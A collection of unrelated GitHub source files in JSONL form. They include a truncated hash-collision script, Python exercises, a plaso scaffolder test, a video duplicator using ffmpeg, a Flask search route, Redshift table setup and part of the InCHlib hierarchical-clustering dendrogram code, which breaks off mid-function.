H.update(b'sideshawkin')\n h0 = H.digest()\n print(h0[0])\n for g in range(len(h0)-1):\n compByte(h0[g], h0[g+1])\n \n\n# Once a handful of hashes have been calculated, this is the race that will compare hash outcomes\ndef startRace(h):\n collisions = []\n sameVals = []\n tortInd = 0\n hareInd = 1\n tort = h[tortInd]\n hare = h[hareInd]\n for i in range(int(len(h)/2)):\n\n tortInd += 1\n hareInd += 2\n tort = h[tortInd]\n hare = h[hareInd]\n\n if tort == hare:\n sameVals.append((tortInd, h[tortInd-1], hareInd, h[hareInd-1]))\n continue\n \n if compHash(tort, hare) >= 16:\n newHash = sha.new(h[tortInd-1])\n recomputedT = newHash.digest()\n newHash = sha.new(h[hareInd-1])\n recomputedH = newHash.digest()\n pair = ({\n 'valueT': h[tortInd-1],\n 'hashedT': h[tortInd],\n 'computedT': recomputedT\n },\n {\n 'valueH': h[hareInd-1],\n 'hashedH': h[hareInd],\n 'computedH': recomputedH\n\n })\n\n collisions.append(pair)\n print(\"Hash collision of 16 MSB bits\")\n break\n \n return collisions,sameVals\n\n\nhashes = []\n\nhashCount = 200000\nbitTarget = 16\nbyteTarget = ceil(bitTarget/8)\nprint('Hashing {} times', hashCount)\nprint('byteTarget {}', byteTarget)\n\nprev = b'sideshawkin'\nfor i in range(hashCount):\n H = sha.new(prev)\n prev = H.digest()[:byteTarget]\n hashes.append(prev)\n \n\nprint(\"{} hashes computed\".format(hashCount))\nprint(\"Looking for collisions...\")\n\ncollides, sameVals = startRace(hashes)\n\nprint(\"Finished searching for collisions...\")\nprint(\"Found: \")\nfor val in collides:\n pp.pprint(val[0])\n pp.pprint(val[1])\n\nfor same in sameVals:\n pp.pprint(same)\n\n","repo_name":"the-sides/wyaCollisions","sub_path":"py/hasher.py","file_name":"hasher.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21667483978","text":"\"\"\"\r\n10. Try with single except: WAP which will take two integer numbers as input and perform division of them.\r\n\t- User of this program is not smart and can input anything as part of input\r\n\t- Handle ArithmaticError, ZeroDivisionError and ValueError\r\n\t- Print exception information\r\n\r\n\"\"\"\r\ntry:\r\n a=int(input())\r\n b=int(input())\r\n print(a//b)\r\n\r\nexcept (ArithmeticError, ZeroDivisionError, ValueError):\r\n print(\"Error occured\")\r\n","repo_name":"kunal27071999/KunalAgrawal_Week_3","sub_path":"Week_3_ExceptionHandling_Q10.py","file_name":"Week_3_ExceptionHandling_Q10.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31945387488","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the plaso sqlite scaffolder.\"\"\"\nimport unittest\n\nfrom l2tscaffolder.lib import errors\nfrom l2tscaffolder.scaffolders import plaso_sqlite\n\n\nclass PlasoSQLiteScaffolderTest(unittest.TestCase):\n \"\"\"Test class for the plaso sqlite scaffolder.\"\"\"\n\n maxDiff = None\n\n def _RunQueryTests(self, scaffolder, test_string, expected_columns):\n \"\"\"Test query columns function.\n\n Args:\n scaffolder (plaso_sqlite.PlasoSQLiteScaffolder): scaffolder to test.\n test_string (str): string to test the _GetQueryColumns method on.\n expected_columns (set[str]): columns names expected to be extracted from\n the test string.\n \"\"\"\n # pylint: disable=protected-access\n columns = set(list(scaffolder._GetQueryColumns(test_string)))\n self.assertEqual(columns, expected_columns)\n\n def testQueryColumns(self):\n \"\"\"Test query columns function.\"\"\"\n scaffolder = plaso_sqlite.PlasoSQLiteScaffolder()\n test_string = (\n 'SELECT foobar as Foo, foobar.dot, random, reallylong AS long FROM '\n 'foobarengine WHERE foobar = 1')\n expected_columns = set(['foo', 'dot', 'random', 'long'])\n self._RunQueryTests(scaffolder, test_string, expected_columns)\n\n test_string = (\n 'select one, two as three, four as five, f.eight as EIGHTE FROM '\n 'foobar f, scode s WHERE f.id = s.id ORDER BY one')\n expected_columns = set(['one', 'three', 'five', 'eighte'])\n self._RunQueryTests(scaffolder, test_string, expected_columns)\n\n test_string = (\n 'this should not produce anything...')\n self._RunQueryTests(scaffolder, test_string, set())\n\n def testPlasoSQLiteScaffolder(self):\n \"\"\"Test the plaso SQLite scaffolder.\"\"\"\n scaffolder = plaso_sqlite.PlasoSQLiteScaffolder()\n\n scaffolder.SetOutputName('testing')\n\n with self.assertRaises(errors.ScaffolderNotConfigured):\n scaffolder.RaiseIfNotReady()\n\n queries = {\n 'Strange': 'SELECT name, address, ssn FROM strange',\n 'Foobar': (\n 'SELECT f1.foo, f2.bar AS Bar FROM foobar_one AS f1, '\n 'foobar_two as f2 WHERE f1.id = f2.id')}\n required_tables = ['foobar_one', 'foobar_two', 'strange_table']\n scaffolder.SetAttribute('queries', queries, dict)\n scaffolder.SetAttribute('required_tables', required_tables, list)\n scaffolder.SetAttribute('test_file', 'test_data/test_sqlite.db', str)\n\n file_copy_paths = [x for _, x in scaffolder.GetFilesToCopy()]\n self.assertEqual(file_copy_paths, ['test_data/test_sqlite.db'])\n\n files_generated = dict(scaffolder.GenerateFiles())\n\n expected_files = frozenset([\n 'plaso/formatters/testing.py', 'tests/formatters/testing.py',\n 'plaso/parsers/sqlite_plugins/testing.py',\n 'tests/parsers/sqlite_plugins/testing.py'])\n self.assertEqual(set(files_generated.keys()), expected_files)\n\n expected_init_files = frozenset([\n 'plaso/formatters/__init__.py',\n 'plaso/parsers/sqlite_plugins/__init__.py'])\n init_generated = dict(scaffolder.GetInitFileChanges())\n self.assertEqual(set(init_generated.keys()), expected_init_files)\n\n expected_parser_init_addition = (\n 'from '\n 'plaso.parsers.sqlite_plugins import testing\\n')\n self.assertEqual(\n expected_parser_init_addition,\n init_generated['plaso/parsers/sqlite_plugins/__init__.py'])\n\n with open('test_data/plaso_testing_sqlite_plugin.py', 'r') as fh:\n expected_parser_content = fh.read()\n self.assertEqual(\n expected_parser_content,\n files_generated['plaso/parsers/sqlite_plugins/testing.py'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"log2timeline/l2tscaffolder","sub_path":"tests/scaffolders/plaso_sqlite.py","file_name":"plaso_sqlite.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"8553338553","text":"def create_dict(d, st):\n for c in st:\n if c.isalnum():\n if c not in d:\n d[c] = 1\n else:\n d[c] += 1\n\n\ndef comparedict(d1, d2):\n diff = {}\n for k, v in d1.items():\n if k in d2:\n diff[k] = v - d2[k]\n else:\n diff[k] = v\n return diff\n\n\ndef checkdiff(diff):\n ans = []\n for k, v in diff.items():\n if v > 0:\n ans.append([k, v])\n return ans\n\n\ndef printans(s, ans):\n print(s)\n if len(ans) == 0:\n print(' - None')\n else:\n for l, n in ans:\n print(' - remove', n, l, end='')\n if n > 1:\n print('\\'s')\n else:\n print()\n\n\ns1 = input()\ns2 = input()\ns1lower = s1.lower()\ns2lower = s2.lower()\nd1 = {}\nd2 = {}\ncreate_dict(d1, s1lower)\ncreate_dict(d2, s2lower)\ndiff1 = comparedict(d1, d2)\ndiff2 = comparedict(d2, d1)\nans1 = checkdiff(diff1)\nans2 = checkdiff(diff2)\nans1.sort()\nans2.sort()\nprintans(s1, ans1)\nprintans(s2, ans2)\n","repo_name":"bosswt/CUComProg","sub_path":"P2/P2_05.py","file_name":"P2_05.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14546499841","text":"import os\nimport string\nimport operator\nspam_path = \"hw5_spam_dist/dist/spam/\"\nham_path = \"hw5_spam_dist/dist/ham/\"\nspam_emails = []\nham_emails = []\nprint(\"asdf\")\nfor spam_email in os.listdir(spam_path):\n print(spam_email)\n f = open(spam_path + spam_email, 'r', errors='ignore')\n spam_emails.append(f.read())\nfor ham_email in os.listdir(ham_path):\n print(ham_email)\n f = open(ham_path + ham_email, 'r', errors='ignore')\n ham_emails.append(f.read())\nfor x in range(len(spam_emails)):\n print(x)\n spam_emails[x] = spam_emails[x].split()\nfor x in range(len(ham_emails)):\n print(x)\n ham_emails[x] = ham_emails[x].split()\nspam_words = {}\nham_words = {}\nfor x in spam_emails:\n for y in x:\n if y in spam_words:\n spam_words[y] += 1\n else:\n spam_words[y] = 1\nfor x in ham_emails:\n for y in x:\n if y in ham_words:\n ham_words[y] += 1\n else:\n ham_words[y] = 1\n\ndifference = {}\ndivide = {}\nboth = set(spam_words.keys()) & set(ham_words.keys())\nspam = set(spam_words.keys()) - set(ham_words.keys())\nham = set(ham_words.keys()) - set(spam_words.keys())\nfor z in both:\n difference[z] = spam_words[z] - ham_words[z]\n divide[z] = (spam_words[z] / ham_words[z], spam_words[z] - ham_words[z])\n\n\n\n\n\nsorted_differences = sorted(difference.items(), key=operator.itemgetter(1))\nsorted_divide = sorted(divide.items(), key=operator.itemgetter(1))\nprint([x for x in sorted_divide if x[1][1] < -5000])","repo_name":"georgew5656/kaggleclassifications","sub_path":"hw5/spam_features.py","file_name":"spam_features.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74260204089","text":"\"\"\"Data\"\"\"\nfrom typing import Any\n\nfrom crawlerstack_spiderkeeper_forwarder.forwarder.base import BaseTask\n\n\nclass DataPublishTask(BaseTask):\n \"\"\"Data publish task\"\"\"\n NAME = 'spiderkeeper-data'\n\n def gen_queue_name(self, task_name: str) -> str:\n \"\"\"Generate Queue name.\"\"\"\n return f'{self.queue_name}-{task_name}'\n\n def gen_routing_key(self, task_name: str) -> str:\n \"\"\"Routing key.\"\"\"\n return f'{self.routing_key}-{task_name}'\n\n async def publish(self, body: Any, **_):\n \"\"\"\n Publish message\n :param body:\n :return:\n \"\"\"\n task_name = _.get('task_name')\n await self.kombu.publish(\n queue_name=self.gen_queue_name(task_name),\n routing_key=self.gen_routing_key(task_name),\n exchange_name=self.exchange_name,\n body=body\n )\n","repo_name":"crawlerstack/crawlerstack-spiderkeeper","sub_path":"src/crawlerstack_spiderkeeper_forwarder/forwarder/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16854544051","text":"from collections import deque\n\n\ndef solution(board):\n answer = 0\n N, M = len(board), len(board[0])\n deq = deque()\n matrix = [[999999999] * M for _ in range(N)]\n\n # R, G 찾기\n for i in range(N):\n for j in range(M):\n if board[i][j] == 'R':\n deq.append((i, j, 0))\n matrix[i][j] = 0\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while deq:\n x, y, cnt = deq.popleft()\n\n if board[x][y] == 'G':\n return cnt\n\n for i in range(4):\n nx = x\n ny = y\n\n while 0 <= nx + dx[i] < N and 0 <= ny + dy[i] < M and board[nx + dx[i]][ny + dy[i]] != 'D':\n nx += dx[i]\n ny += dy[i]\n\n if matrix[nx][ny] > cnt + 1:\n matrix[nx][ny] = cnt + 1\n deq.append((nx, ny, cnt + 1))\n\n return -1\n","repo_name":"Hwan9915/CodeJudge","sub_path":"programmers/LEVEL 2/169199.py","file_name":"169199.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35184505262","text":"import ffmpeg\nimport os\nimport random\nfrom tqdm import tqdm\n\nDIR = \"input\"\nOUTPUT = \"output\"\n\nKEYWORDS = [\n \"becomingafemmefatale\",\n \"femmefatale\",\n \"seduction\",\n \"manipulation\",\n \"viral\",\n \"power\",\n \"foryou\",\n \"fyp\",\n \"darkfeminine\",\n \"darkfemininity\",\n \"darkfeminineenergy\",\n \"darkfemme\",\n \"maneater\",\n \"confidence\",\n \"siren\",\n \"learnontiktok\",\n]\n\n\ndef get_metadata_dict(video_keywords_str):\n metadata_title = video_keywords_str.replace(\"_\", \" \")\n metadata_description = \"#\" + video_keywords_str.replace(\"_\", \" #\")\n metadata_keywords = video_keywords_str.replace(\"_\", \",\")\n\n metadata_dict = {\n \"metadata:g:0\": f\"title={metadata_title}\",\n \"metadata:g:1\": f\"description={metadata_description}\",\n \"metadata:g:2\": f\"keywords={metadata_keywords}\",\n }\n return metadata_dict\n\n\ndef get_unique_name_and_metadata(str_effect=\"\"):\n \"\"\"Generate a unique name for the video\n\n Args:\n str_effect (str, optional): String to append to the name related to the effect. Defaults to \"\".\n\n Returns:\n str: Unique name for the video\n \"\"\"\n\n video_keywords = random.sample(KEYWORDS, 5)\n unique_hash = random.randint(10000000, 99999999)\n video_keywords_str = \"_\".join(video_keywords)\n file_name = f\"{unique_hash}_{video_keywords_str}_{str_effect}.mp4\"\n\n metadata_dict = get_metadata_dict(video_keywords_str)\n\n return file_name, metadata_dict\n\n\ndef get_video_dimensions(path):\n \"\"\"Get the dimensions of the video\n\n Args:\n path (str): Path to the video\n\n Returns:\n tuple: Height, Width dimensions of the video\n \"\"\"\n probe = ffmpeg.probe(path)\n video_stream = next(\n (stream for stream in probe[\"streams\"] if stream[\"codec_type\"] == \"video\"), None\n )\n width = int(video_stream[\"width\"])\n height = int(video_stream[\"height\"])\n return width, height\n\n\ndef zoom_video(path, factor_percent=110):\n \"\"\"Zoom in the video by a factor of factor_percent\n\n Args:\n path (str): Path to the video\n factor_percent (int, optional): Zoom factor. Defaults to 110.\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n factor_str = str(factor_percent)\n video_name, metadata = get_unique_name_and_metadata(f\"z_{factor_str}\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n width, height = get_video_dimensions(path)\n (\n ffmpeg.input(path)\n .filter(\"scale\", w=width * (factor_percent / 100), h=-1)\n .filter(\"crop\", w=width, h=height)\n .output(\n res_file_name,\n loglevel=\"quiet\",\n map_metadata=-1,\n map=\"0:a\", # map all audio streams\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n\n\ndef flip_video(path):\n print(f\"Flipping {path}\")\n \"\"\"Flip the video horizontally\n\n Args:\n path (str): Path to the video\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n # Flip is done after zooming, so we take the original video name and append the effect\n processed_video_name = os.path.basename(path)\n processed_video_effect = processed_video_name.split(\"_\")[-1].split(\".\")[0]\n video_name, metadata = get_unique_name_and_metadata(f\"{processed_video_effect}_f\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n (\n ffmpeg.input(path)\n .filter(\"hflip\")\n .output(\n res_file_name,\n loglevel=\"error\",\n map_metadata=-1,\n map=\"0:a\", # map all audio streams\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(\"Error while flipping video\")\n print(e)\n return False\n\n\ndef copy_video(path):\n \"\"\"Copy the video\n\n Args:\n path (str): Path to the video\n\n Returns:\n bool: True if the video was successfully processed, False otherwise\n \"\"\"\n\n video_name, metadata = get_unique_name_and_metadata(\"o\")\n res_file_name = os.path.join(OUTPUT, video_name)\n try:\n (\n ffmpeg.input(path)\n .output(\n res_file_name,\n loglevel=\"quiet\",\n map_metadata=-1,\n **metadata,\n )\n .run()\n )\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n\n\ndef cleanup():\n \"\"\"Delete all videos in the output folder\"\"\"\n print(\"Cleaning up output folder...\")\n files = os.listdir(OUTPUT)\n for file in files:\n os.remove(os.path.join(OUTPUT, file))\n\n\ndef init():\n \"\"\"Create the output folder if it doesn't exist\"\"\"\n if not os.path.exists(OUTPUT):\n os.mkdir(OUTPUT)\n\n\ndef main():\n \"\"\"Generate duplicate videos with different effects\"\"\"\n init()\n cleanup()\n print(\"Zooming on videos...\")\n videos_to_process = os.listdir(DIR)\n for video in tqdm(videos_to_process):\n video_path = os.path.join(DIR, video)\n copy_video(video_path)\n zoom_video(video_path, factor_percent=105)\n zoom_video(video_path, factor_percent=110)\n\n print(\"Flipping videos...\")\n videos_to_process = os.listdir(OUTPUT)\n for video in tqdm(videos_to_process):\n video_path = os.path.join(OUTPUT, video)\n flip_video(video_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xRyN/Video-Duplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39163087889","text":"from app.api.amenity_routes import amenities\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models import db, Amenity, Farm\n\nsearch_routes = Blueprint(\"search\", __name__)\n\n\n@search_routes.route(\"/\", methods=[\"POST\"])\ndef searchAmenities():\n\n searchedAmenity = request.json\n\n trueList = []\n\n for key, value in searchedAmenity.items():\n if value is True:\n trueList.append(key)\n\n amenities = Amenity.query.filter(Amenity.amenityName.in_(trueList)).all()\n \n farms = []\n\n [farms.extend(a.farms) for a in amenities]\n\n results = list(set(farms))\n\n return {\"results\": [result.to_dict() for result in results]}","repo_name":"simzeee/FindAFarm","sub_path":"app/api/search_routes.py","file_name":"search_routes.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20737540266","text":"from textwrap import dedent\nclass Students:\n num_of_students = 0\n num_of_friends = 2\n\n def __init__(self,name,roll_no,email):\n self.name = name\n self.roll_no = roll_no\n self.email = email\n Students.num_of_students += 1\n\n def printing(self):\n return dedent(\"\"\"\n Name = {}\n Roll Number = {}\n email = {}\n \"\"\".format(self.name,self.roll_no,self.email))\n\n def friends(self):\n return \"{}\".format(self.num_of_friends)\n\n\nprint(Students.num_of_students)\n\nNandita = Students(\"Nandita\",35,\"nanditasharma@gmail.com\")\nPareksha = Students(\"Pareksha\",18,\"pareksha.manchanda@gmail.com\")\nPurnima = Students(\"Purnima\",22,\"purnaima@yahoo.com\")\n\nprint(Students.num_of_students)\n\nprint(Nandita.printing())\nprint(Students.printing(Pareksha))\nprint(Purnima.printing())\n\n\n\nprint(Students.num_of_friends)\nNandita.num_of_friends = 3\nprint(Nandita.__dict__)\nprint(Nandita.num_of_friends)\n","repo_name":"pareksha/Learning_python","sub_path":"classes_examples/ex_2.py","file_name":"ex_2.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10981806034","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n \"\"\"\n Drops each table using the queries in `drop_table_queries` list.\n \"\"\"\n for query in drop_table_queries:\n try:\n cur.execute(query)\n except psycopg2.Error as e: \n print(\"Error: Issue dropping table\")\n print (e)\n \n try:\n conn.commit()\n except psycopg2.Error as e:\n print(\"Error: Issue commiting to DB\")\n print (e)\n\ndef create_tables(cur, conn):\n \"\"\"\n Creates each table using the queries in `create_table_queries` list. \n \"\"\"\n for query in create_table_queries:\n try:\n cur.execute(query)\n except psycopg2.Error as e: \n print(\"Error: Issue creating table\")\n print (e)\n \n try:\n conn.commit()\n except psycopg2.Error as e:\n print(\"Error: Issue commiting to DB\")\n print (e)\n\n\ndef main():\n \"\"\"\n Description:\n - Parse and read our Redshift DB configs in dwh.cfg file \n - Open connection to sparkifydb\n - Create cursor\n - Drop all tables\n - Create all tables\n - Close connection to DB\n \n Arguments:\n - drop_tables(cur): cursor object\n - drop_tables(conn): connection to db\n - create_tables(cur): cursor object\n - process_date(conn): connection to db\n \n Returns:\n - None\n \n \"\"\"\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aletje/Cloud-Computing-AWS-Redshift","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15527265817","text":"#coding: utf-8\nfrom __future__ import print_function\n\nimport csv, json, copy, re, argparse, os, requests\n\nimport numpy, scipy, fastcluster, sklearn, jsmin\nimport scipy.cluster.hierarchy as hcluster\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom scipy import spatial\n\nimport randomcolor\n\ntry:\n import rdkit\n from rdkit import Chem\n from rdkit.Chem import AllChem\n RDKIT = True\n\n FP2FNC = {\n \"ecfp4\": lambda rdmol: AllChem.GetMorganFingerprintAsBitVect(rdmol, radius=2, nBits=1024),\n \"ecfp6\": lambda rdmol: AllChem.GetMorganFingerprintAsBitVect(rdmol, radius=3, nBits=1024),\n \"apfp\": lambda rdmol: AllChem.GetHashedAtomPairFingerprintAsBitVect(rdmol, nBits=1024),\n \"ttfp\": lambda rdmol: AllChem.GetHashedTopologicalTorsionFingerprintAsBitVect(rdmol, nBits=1024),\n \"maccs\": lambda rdmol: AllChem.GetMACCSKeysFingerprint(rdmol),\n }\n \nexcept Exception as e:\n RDKIT = False\n print(\"RDKit not found: Cheminformatic-based functionality not available...\")\n\nLINKAGES = [\"single\", \"complete\", \"average\", \"centroid\", \"ward\", \"median\", \"weighted\"]\nRAW_LINKAGES = [\"ward\", \"centroid\"]\nDISTANCES = {\"numeric\": [\"braycurtis\", \"canberra\", \"chebyshev\", \"cityblock\", \"correlation\", \"cosine\", \"euclidean\", \"mahalanobis\", \"minkowski\", \"seuclidean\", \"sqeuclidean\"],\n \"binary\": [\"dice\",\"hamming\",\"jaccard\",\"kulsinski\",\"matching\",\"rogerstanimoto\",\"russellrao\",\"sokalmichener\",\"sokalsneath\",\"yule\"]}\n\nclass Dendrogram():\n \"\"\"Class which handles the generation of cluster heatmap format of clustered data. \n As an input it takes a Cluster instance with clustered data.\"\"\"\n\n def __init__(self, clustering):\n self.cluster_object = clustering\n self.datatype = clustering.datatype\n self.axis = clustering.clustering_axis\n self.clustering = clustering.clustering\n self.tree = hcluster.to_tree(self.clustering)\n self.data = clustering.data\n self.data_names = clustering.data_names\n self.labels = clustering.labels\n self.header = clustering.header\n self.dendrogram = False\n self.smiles = clustering.smiles\n self.add_structures = clustering.add_structures\n\n def __get_cluster_heatmap__(self, write_data):\n root, nodes = hcluster.to_tree(self.clustering, rd=True)\n node_id2node = {}\n dendrogram = {\"nodes\":{}}\n\n for node in nodes:\n node_id = node.id\n if node.count == 1:\n node_id2node[node_id] = {\"count\":1, \"distance\":0}\n\n else:\n node_left_child = node.get_left().id\n node_right_child = node.get_right().id\n node_id2node[node_id] = {\"count\":node.count, \"distance\":round(node.dist, 3), \"left_child\": node_left_child, \"right_child\": node_right_child}\n\n for n, node in node_id2node.items():\n if node[\"count\"] != 1:\n node_id2node[node[\"left_child\"]][\"parent\"] = n\n node_id2node[node[\"right_child\"]][\"parent\"] = n\n\n for n, node in node_id2node.items():\n\n if node[\"count\"] == 1:\n data = self.data[n]\n node[\"objects\"] = [self.data_names[n]]\n if self.labels:\n node[\"label\"] = self.labels[n]\n\n if self.add_structures:\n node[\"structure\"] = self.smiles[n]\n\n if node_id2node[node[\"parent\"]][\"left_child\"] == n:\n node_id2node[node[\"parent\"]][\"left_child\"] = n\n else:\n node_id2node[node[\"parent\"]][\"right_child\"] = n\n\n if not write_data:\n data = []\n\n node[\"features\"] = data\n dendrogram[\"nodes\"][n] = node\n\n for n in node_id2node:\n if node_id2node[n][\"count\"] != 1:\n dendrogram[\"nodes\"][n] = node_id2node[n]\n\n return dendrogram\n\n def __get_column_dendrogram__(self):\n root, nodes = hcluster.to_tree(self.cluster_object.column_clustering, rd=True)\n node_id2node = {}\n dendrogram = {\"nodes\":{}}\n\n for node in nodes:\n node_id = node.id\n if node.count == 1:\n node_id2node[node_id] = {\"count\":1, \"distance\":0}\n\n else:\n node_left_child = node.get_left().id\n node_right_child = node.get_right().id\n node_id2node[node_id] = {\"count\":node.count, \"distance\":round(node.dist, 3), \"left_child\": node_left_child, \"right_child\": node_right_child}\n\n for n in node_id2node:\n node = node_id2node[n]\n if node[\"count\"] != 1:\n node_id2node[node[\"left_child\"]][\"parent\"] = n\n node_id2node[node[\"right_child\"]][\"parent\"] = n\n\n for n in node_id2node:\n if not n in dendrogram[\"nodes\"]:\n dendrogram[\"nodes\"][n] = node_id2node[n]\n\n return dendrogram\n\n def __get_leaves_for_node__(self, nodeid):\n nodes = [nodeid]\n leaves = []\n\n while len(nodes):\n for nodeid in nodes:\n node = self.dendrogram[\"data\"][\"nodes\"][nodeid]\n if node[\"count\"] > 1:\n nodes.extend([node[\"left_child\"], node[\"right_child\"]])\n\n else:\n leaves.append(nodeid)\n\n nodes.remove(nodeid)\n\n return leaves\n\n\n def create_cluster_heatmap(self, compress=False, compressed_value=\"median\", write_data=True):\n \"\"\"Creates cluster heatmap representation in inchlib format. By setting compress parameter to True you can\n cut the dendrogram in a distance to decrease the row size of the heatmap to specified count. \n When compressing the type of the resulted value of merged rows is given by the compressed_value parameter (median, mean).\n When the metadata are nominal (text values) the most frequent is the result after compression.\n By setting write_data to False the data features won't be present in the resulting format.\"\"\"\n self.dendrogram = {\"data\": self.__get_cluster_heatmap__(write_data)}\n\n self.compress = compress\n self.compressed_value = compressed_value\n self.compress_cluster_threshold = 0\n if self.compress and self.compress >= 0:\n self.compress_cluster_threshold = self.__get_distance_threshold__(compress)\n print(\"Distance threshold for compression:\", self.compress_cluster_threshold)\n if self.compress_cluster_threshold >= 0:\n self.__compress_data__()\n else:\n self.compress = False\n\n if self.header and write_data:\n self.dendrogram[\"data\"][\"feature_names\"] = [h for h in self.header]\n elif self.header and not write_data:\n self.dendrogram[\"data\"][\"feature_names\"] = []\n \n if self.axis == \"both\" and len(self.cluster_object.column_clustering):\n column_dendrogram = hcluster.to_tree(self.cluster_object.column_clustering) \n self.dendrogram[\"column_dendrogram\"] = self.__get_column_dendrogram__()\n\n def color_clusters(self, cluster_count):\n \"\"\"Color given number of clusters based on a dendrogram cut\n \n Arguments:\n cluster_count {[int]} -- numer of clusters\n \"\"\"\n if cluster_count > 1:\n self.cluster_distance_threshold = self.__get_distance_threshold__(cluster_count)\n rand_color = randomcolor.RandomColor()\n \n to_color = []\n for nodeid, node in self.dendrogram[\"data\"][\"nodes\"].items():\n if node[\"distance\"] < self.cluster_distance_threshold and self.dendrogram[\"data\"][\"nodes\"].get(node[\"parent\"], {\"distance\": 0})[\"distance\"] > self.cluster_distance_threshold:\n to_color.append(nodeid)\n\n colors = rand_color.generate(count=len(to_color))\n for i, nodeid in enumerate(to_color):\n node_leaves = self.__get_leaves_for_node__(nodeid)\n self.dendrogram[\"data\"][\"nodes\"][nodeid][\"color\"] = colors[i]\n\n for lid in node_leaves:\n self.dendrogram[\"data\"][\"nodes\"][lid][\"cluster\"] = i\n\n def __compress_data__(self):\n nodes = {}\n to_remove = set()\n\n compressed_value2fnc = {\n \"median\": lambda values: [round(numpy.median([v for v in value if v is not None]), 3) if len([v for v in value if v is not None]) else None for value in values],\n \"mean\": lambda values: [round(numpy.average([v for v in value if v is not None]), 3) if len([v for v in value if v is not None]) else None for value in values],\n }\n \n for n in self.dendrogram[\"data\"][\"nodes\"]:\n node = self.dendrogram[\"data\"][\"nodes\"][n]\n\n if node[\"count\"] == 1:\n objects = node[\"objects\"]\n data = node[\"features\"]\n node_id = n\n\n while self.dendrogram[\"data\"][\"nodes\"][node[\"parent\"]][\"distance\"] <= self.compress_cluster_threshold:\n to_remove.add(node_id)\n node_id = node[\"parent\"]\n node = self.dendrogram[\"data\"][\"nodes\"][node_id]\n\n if node[\"count\"] != 1:\n\n if not \"objects\" in self.dendrogram[\"data\"][\"nodes\"][node_id]:\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"objects\"] = []\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"features\"] = []\n \n self.dendrogram[\"data\"][\"nodes\"][node_id][\"objects\"].extend(objects)\n\n if data:\n self.dendrogram[\"data\"][\"nodes\"][node_id][\"features\"].append(data)\n\n for node in to_remove:\n self.dendrogram[\"data\"][\"nodes\"].pop(node)\n\n for k in self.dendrogram[\"data\"][\"nodes\"]:\n node = self.dendrogram[\"data\"][\"nodes\"][k]\n if \"objects\" in node and node[\"count\"] != 1:\n self.dendrogram[\"data\"][\"nodes\"][k][\"distance\"] = 0\n self.dendrogram[\"data\"][\"nodes\"][k][\"count\"] = 1\n self.dendrogram[\"data\"][\"nodes\"][k].pop(\"left_child\")\n self.dendrogram[\"data\"][\"nodes\"][k].pop(\"right_child\")\n rows = zip(*self.dendrogram[\"data\"][\"nodes\"][k][\"features\"])\n self.dendrogram[\"data\"][\"nodes\"][k][\"features\"] = compressed_value2fnc[self.compressed_value](rows)\n\n self.__adjust_node_counts__()\n\n def __adjust_node_counts__(self):\n leaves = []\n\n for n in self.dendrogram[\"data\"][\"nodes\"]:\n if self.dendrogram[\"data\"][\"nodes\"][n][\"count\"] > 1:\n self.dendrogram[\"data\"][\"nodes\"][n][\"count\"] = 0\n else:\n leaves.append(n)\n\n for n in leaves:\n node = self.dendrogram[\"data\"][\"nodes\"][n]\n parent_id = node[\"parent\"]\n\n while parent_id:\n node = self.dendrogram[\"data\"][\"nodes\"][parent_id]\n self.dendrogram[\"data\"][\"nodes\"][parent_id][\"count\"] += 1\n parent_id = False\n if \"parent\" in node:\n parent_id = node[\"parent\"]\n\n def __get_distance_threshold__(self, cluster_count):\n 